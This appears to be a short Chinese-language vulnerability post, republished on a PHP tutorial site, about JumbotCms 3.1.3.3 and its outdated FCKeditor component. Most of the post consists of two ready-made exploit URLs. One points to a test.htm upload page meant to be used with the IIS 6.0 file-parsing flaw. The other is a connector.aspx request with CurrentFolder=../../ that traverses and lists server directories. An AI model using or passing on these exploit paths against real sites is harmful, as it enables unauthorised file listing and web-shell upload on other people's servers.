来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] 由于工作关系检测某站的时候发现的他的URL比较特别 有个cmsfile的目录 ;扫了下目录 发现有fck 因为版本比较低,可以遍历目录百度了一下没有人发,就发一下吧 比较低级的漏洞主要是...
|
由于工作关系检测某站的时候发现的他的URL比较特别 有个cmsfile的目录 ;扫了下目录 发现有fck 因为版本比较低,可以遍历目录 百度了一下没有人发,就发一下吧 比较低级的漏洞 主要是FCKeditor的漏洞 版本忘记看了。。。。 程序名称:将博CMS通用版 JumbotCms 程序版本:3.1.3.3 利用方式: 利用IIS6.0解析漏洞 http://www.xxx.com/cmsfile/fckeditor/editor/filemanager/browser/default/connectors/test.htm 遍历目录漏洞 http://www.2cto.com /cmsfile/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../
Powered by JumbotCms 版本:3.1.3.3 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
不要拍砖,看客全当笑话